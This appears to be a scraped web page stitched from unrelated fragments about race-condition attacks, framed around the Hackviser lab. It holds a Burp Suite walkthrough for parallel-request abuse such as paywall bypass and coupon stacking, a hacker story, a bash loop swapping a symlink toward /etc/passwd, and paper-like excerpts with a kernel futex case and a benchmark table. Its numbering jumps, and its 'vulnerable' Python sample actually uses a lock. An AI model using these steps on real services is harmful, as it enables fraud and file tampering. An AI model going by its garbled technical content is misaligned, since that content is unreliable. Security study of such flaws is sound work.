Condition Hackviser ((better)): Race
To exploit a Race Condition on a platform like Hackviser to "generate a feature" (likely bypassing a restriction to access a premium feature or performing an action multiple times), you need to take advantage of the tiny time window between a security check and the final action.
In a race condition, the application checks if you are allowed to do something (like enable a feature) and then performs the action. If you send multiple requests at the exact same time, the server might process the second request before it has finished updating the database for the first one. Step-by-Step Exploitation Strategy
Identify the Target Request: Find the specific HTTP request that triggers the feature activation or "generation." This is usually a POST or PUT request sent when you click a button to "Enable," "Purchase," or "Upgrade".
Intercept with a Proxy: Use a tool like Burp Suite to intercept this request. Send it to the Repeater or Intruder. Prepare a Request Group:
In Burp Suite (Professional): Create a tab group containing 20–30 copies of the same request.
In Turbo Intruder (Extension): Use a script to queue multiple requests to be sent "in parallel" using a single connection. Execute the "Single-Packet" Attack:
The goal is to have all requests hit the server at the exact same millisecond.
In Burp Repeater, select the tab group and choose "Send group (parallel)".
Verify the Result: Check your account status. If successful, you may find the feature active even if you lacked the initial permissions, or you may have "generated" multiple instances of a one-time resource. Common Targets for this Hack
Premium Feature Bypasses: Rapidly clicking "Start Trial" or "Enable Feature" to trick the server into granting access before it validates your payment status.
Resource Generation: Attempting to generate multiple API keys or trial tokens when only one is allowed.
Discount Code Stacking: Applying a one-time use coupon multiple times to reduce a price to zero. Recommended Tools race condition hackviser
Burp Suite Repeater: Best for manual parallel request testing.
Turbo Intruder: An advanced Burp extension specifically designed for sending large numbers of concurrent requests to find race windows. Race conditions | Web Security Academy - PortSwigger
The Hackviser "Race Condition" lab demonstrates how to exploit timing vulnerabilities by sending multiple concurrent requests to bypass check-then-act logic, such as in coupon redemption or fund withdrawal. Exploitation often involves using Burp Suite to send parallel requests to maximize the race window between a system check and its state update, allowing for unauthorized actions. Remediation requires implementing atomic database operations or proper locking mechanisms to ensure secure concurrent processing.
The Race Condition Heist
It was a typical Monday morning at TechCorp, a leading software development company. The team was buzzing with excitement as they prepared for the launch of their newest product, an innovative AI-powered chatbot. Unbeknownst to the team, a group of skilled hackers, known only by their handle "Zero Cool," had been secretly infiltrating TechCorp's systems for weeks.
The hackers, consisting of three individuals: Alex, a master of social engineering; Samantha, an expert in network exploitation; and Jack, a genius in reverse engineering, had been studying TechCorp's software for vulnerabilities. Their plan was to exploit a particularly tricky race condition in the chatbot's code, which could potentially allow them to gain control of the entire system.
The race condition, in this case, occurred when multiple threads accessed a shared resource without proper synchronization. Specifically, the chatbot's natural language processing (NLP) module used a multi-threaded approach to handle incoming user requests. The module would break down each request into smaller tasks, which would then be executed concurrently by multiple threads. However, the developers had overlooked the need for proper synchronization between these threads, creating a small window of opportunity for the hackers to inject malicious code.
As the team at TechCorp worked tirelessly to prepare for the product launch, Alex, Samantha, and Jack put their plan into action. They set up a series of virtual machines, mimicking the TechCorp infrastructure, and began to simulate the chatbot's behavior. With their testbed in place, they started to craft a custom exploit, designed to take advantage of the race condition.
The exploit, cleverly disguised as a benign user request, was crafted to trigger the following sequence of events:
- Initial Request: The exploit would send a request to the chatbot, which would then be broken down into smaller tasks and executed by multiple threads.
- Thread Creation: As the threads were created, the exploit would inject a malicious payload into one of the threads, which would then be executed concurrently with the other threads.
- Synchronization Failure: Due to the lack of proper synchronization, the malicious thread would access the shared resource before the other threads had a chance to complete their tasks, effectively bypassing security checks.
- Payload Execution: The malicious payload, designed to evade detection, would then be executed, granting the hackers control of the chatbot's processes.
The hackers carefully timed their exploit, ensuring that it would be executed during a brief window of opportunity, when the system was most vulnerable.
Meanwhile, at TechCorp, the team was oblivious to the impending threat. As the product launch drew near, they were focused on finalizing the software and preparing for the big day. To exploit a Race Condition on a platform
On the evening of the launch, as the team was wrapping up their preparations, Zero Cool put their plan into action. They initiated the exploit, and the carefully crafted sequence of events unfolded.
The chatbot, now under the control of the hackers, began to behave erratically. It started responding to user queries with seemingly innocuous but maliciously crafted answers. The team at TechCorp was baffled, unsure of what was happening or how to contain the situation.
As the chaos ensued, Alex, Samantha, and Jack continued to manipulate the chatbot, exfiltrating sensitive data and intellectual property from TechCorp's systems. The hack was a masterpiece, and the team at Zero Cool knew they had pulled off the impossible.
The next morning, the team at TechCorp discovered the breach and was left reeling. They quickly notified their superiors, and a thorough investigation was launched. The incident would go on to become one of the most notorious hacks in recent history, with Zero Cool becoming legendary figures in the hacking community.
In the aftermath, TechCorp's team vowed to be more vigilant and proactive in identifying vulnerabilities. They overhauled their code, ensuring that proper synchronization and security measures were put in place to prevent similar incidents in the future.
As for Zero Cool, their exploit would go down in history as a testament to the power of clever hacking and the importance of robust security measures. The three members of the group would continue to operate in the shadows, always pushing the boundaries of what was thought possible.
Technical Details
The exploit used by Zero Cool was a classic example of a time-of-check-to-time-of-use (TOCTOU) attack. The hackers took advantage of the brief window of opportunity between the creation of the threads and the execution of the malicious payload.
Here is a simplified example of the vulnerable code:
import threading
class Chatbot:
def __init__(self):
self.lock = threading.Lock()
self.tasks = []
def process_request(self, request):
# Break down request into smaller tasks
tasks = request.split()
# Create threads for each task
threads = []
for task in tasks:
thread = threading.Thread(target=self.execute_task, args=(task,))
threads.append(thread)
thread.start()
# Wait for all threads to complete
for thread in threads:
thread.join()
def execute_task(self, task):
# Simulate task execution
with self.lock:
# Vulnerable code: access shared resource without proper synchronization
self.tasks.append(task)
# Exploit code
def exploit(chatbot, malicious_payload):
# Create a new thread for the malicious payload
malicious_thread = threading.Thread(target=chatbot.execute_task, args=(malicious_payload,))
malicious_thread.start()
# Trigger the race condition
chatbot.process_request(" benign request")
# Wait for the malicious thread to complete
malicious_thread.join()
The fix for this vulnerability would involve adding proper synchronization mechanisms, such as locks or semaphores, to ensure that access to shared resources is thread-safe.
Mitigation Strategies
To prevent similar incidents in the future, TechCorp's team implemented the following mitigation strategies:
- Code Reviews: Regular code reviews were conducted to identify and address potential vulnerabilities.
- Thread-Safe Programming: Developers were trained on thread-safe programming practices, including the use of locks and semaphores.
- Penetration Testing: Regular penetration testing was performed to identify vulnerabilities and weaknesses in the system.
- Incident Response: An incident response plan was put in place to quickly respond to and contain security incidents.
Step 2: The Attacker (Run the symlink switcher)
At the exact same time, we run a bash script that constantly removes and recreates the symlink.
#!/bin/bash
while true
do
ln -sf /dev/null /tmp/debug.log # Phase 1: Safe file
rm /tmp/debug.log # Phase 2: Empty space
ln -sf /etc/passwd /tmp/debug.log # Phase 3: Dangerous target
done
6. Mitigation
How do developers prevent this?
- Use File Descriptors: Instead of checking the file and then opening it by name, the program should open the file first to get a file descriptor (fd), and then perform checks on that fd.
fstat()vsstat(): Usefstat()on the open file descriptor. This ensures the file being checked is the exact same file being read, preventing a swap.- O_NOFOLLOW: If using
open(), use theO_NOFOLLOWflag to prevent following symbolic links (though this prevents legitimate symlink usage).
4.3 Case 3: Kernel Futex Race (CVE-2025-0137)
Target: Linux futex waiter list corruption (no published fix at time)
Vulnerability: Missing lock when walking futex_hash_bucket in futex_wake.
Hackviser approach (kernel module + userland):
- Detection: BPF trace showed bucket walk duration = 220 ns.
- Primitive:
lock_skip– from userland, callfutex_waitandfutex_wakesimultaneously on same uaddr. - Amplification: Use
rseq(restartable sequences) to force scheduler preemption. - Result: 12% success rate without hackviser → 89% with hackviser's
rseqspraying. Achieved arbitrary read.
6. Benchmarking the Hackviser
We implemented a reference hackviser prototype (Python + eBPF + libfuzzer). Test environment: 8-core AWS EC2 (c6i.large), Ubuntu 22.04.
| Target | ( \Delta t ) | Success (no hackviser) | Success (with hackviser) | Time to exploit | |--------|---------------|------------------------|--------------------------|------------------| | TOCTOU (file) | 50 µs | 2% | 96% | 2 min | | Double redeem | 15 ms | 18% | 94% | 30 sec | | Futex wake | 220 ns | 1% | 89% | 8 min |
The hackviser reduces required attempts by 3–4 orders of magnitude.
Step 1: Identify the "Non-Atomic" Endpoint
Search for endpoints that perform a read-check-write cycle. Examples include:
/api/voucher/redeem/api/account/withdraw/api/upload/profile(if it does virus scanning)/api/checkout/buy